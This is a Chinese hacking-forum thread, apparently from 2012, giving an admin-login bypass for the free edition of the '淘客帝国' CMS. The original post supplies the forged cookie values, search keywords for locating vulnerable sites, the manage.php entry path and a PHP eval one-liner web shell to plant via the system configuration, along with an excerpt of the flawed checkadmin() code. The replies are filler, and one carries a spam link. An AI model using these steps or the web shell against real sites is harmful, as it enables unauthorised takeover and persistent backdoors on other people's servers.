查看: 2332|回复: 25

淘客帝国系统后台cookie欺骗漏洞及后台拿shell

[复制链接]
发表于 2012-12-1 05:31:33 | 显示全部楼层 |阅读模式
偶然发现的淘客帝国免费版的后台可以cookie欺骗

  工具:   老兵的cookie'欺骗工具  
关键字: 分类- 商城- 品牌- 女人- 男人- 美容- 鞋包- 数码- 居家- 食品

     首先打开工具把cookie改为 COOKIEadminuser=admin; DedeUserID=1; PHPSESSID=11111 ,然后再工具的地址栏那里输入网站的后台(默认后台/admin)等页面全部出来后再在后台目录后加上manage.php 跳转就可以进入后台了,进入后台后怎么样拿shell就简单了,这里就不说了..

补下代码【anfli 补】
getshell 简单 系统配置 {${@eval($_POST['cmd'])}} 一句话连接地址/data/configdata.php
  顺便补一下代码===================|The End}##admin目录下php 部验证##
--------------------main.php
<?php
require_once '../include/adminfunction.php';
checkadmin();
---------------------/include/sysfunction.php
#####

function checkadmin(){
         global $COOKIEadminuser;
         global $sitetitleurl;
         //判断
         if( (isset($_COOKIE['COOKIEadminuser']) && $_COOKIE['COOKIEadminuser']!="") || (isset($_SESSION['adminuser']) && $_SESSION['adminuser']!="") ){
         }  else  {
                 echo("<script language='JavaScript'>;top.location.href='".$sitetitleurl."';</script>");
                        exit;
         }

一看就懂
        $_COOKIE['COOKIEadminuser']!="" 只要不为空就ok  
            //index.php 一看到这里就知道 程序员自己催眠了自己 登出就把adminuser 清空 .........COOKIEadminuser是干神马的?
            
            /admin/index.php 是不会通过验证 但是如果访问/admin/manage.php 的话一样ok 也就lz所谓的偶然发现了 COOKIEadminuser 并没有空
            
            if($action=="loginout"){
                         $_SESSION['adminuser'] = "";
                         SetCookie("adminuser", "");
                         redirect_to($sitetitleurl);

                        其实所有审计过程 是倒序   
&#8203;


发表于 2012-12-3 06:54:43 | 显示全部楼层
任何的限制,都是从自己的内心开始的。  
发表于 2012-12-4 08:41:44 | 显示全部楼层
楼上的稍等啦  
发表于 2012-12-6 18:27:57 | 显示全部楼层
天泽在线http://www.ak69v.com,升官发财  
发表于 2012-12-8 22:54:15 | 显示全部楼层
水至清则无鱼,人至贱则无敌!  
发表于 2014-11-17 02:06:12 | 显示全部楼层
哈哈 瞧你说的~~~  
发表于 2014-12-4 15:12:02 | 显示全部楼层
楼主的内容不管你信不信,反正我信了
发表于 2014-12-27 16:40:00 | 显示全部楼层
顶你一下,好贴要顶!  
发表于 2015-1-27 15:38:07 | 显示全部楼层
我十目一行也还是看不懂啊  
发表于 2015-3-1 12:52:38 | 显示全部楼层
不错不错.,..我喜欢  
高级模式
B Color Image Link Quote Code Smilies

本版积分规则